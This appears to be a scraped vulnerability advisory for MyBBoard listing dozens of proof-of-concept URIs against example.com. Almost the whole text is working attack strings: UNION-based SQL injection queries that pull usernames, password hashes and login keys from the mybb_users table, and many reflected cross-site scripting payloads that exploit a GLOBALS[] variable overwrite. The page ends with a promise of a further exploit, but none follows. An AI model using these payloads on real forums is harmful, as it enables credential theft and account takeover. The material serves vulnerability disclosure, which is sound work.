|
MyBBoard Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept URI are available: http://www.example.com/misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/* http://www.example.com/showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/* http://www.example.com/showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/* http://www.example.com/global.php?bbclosedwarning=<script>alert(document.cookie);</script> http://www.example.com/index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script> http://www.example.com/calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=<script>alert(document.cookie);</script> http://www.example.com/calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=<script>alert(document.cookie);</script> http://www.example.com/calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(document.cookie);</script> http://www.example.com/editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie);</script> http://www.example.com/forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie);</script> http://www.example.com/forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script> http://www.example.com/forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.cookie);</script> http://www.example.com/forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie);</script> http://www.example.com/memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</script> http://www.example.com/misc.php?action=help&GLOBALS[]=1§ions=<script>alert(document.cookie);</script> http://www.example.com/misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.cookie);</script> http://www.example.com/misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cookie);</script> http://www.example.com/online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.cookie);</script> http://www.example.com/portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script> http://www.example.com/portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</script> http://www.example.com/portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</script> http://www.example.com/private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</script> http://www.example.com/private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(document.cookie);</script> http://www.example.com/private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(document.cookie);</script> http://www.example.com/private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document.cookie);</script> http://www.example.com/private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document.cookie);</script> http://www.example.com/showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</script> http://www.example.com/showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</script> http://www.example.com/showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</script> http://www.example.com/showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cookie);</script> http://www.example.com/stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(document.cookie);</script> http://www.example.com/usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert(document.cookie);</script> The following proof of concept exploit is available: |
|
|
Privacy Statement |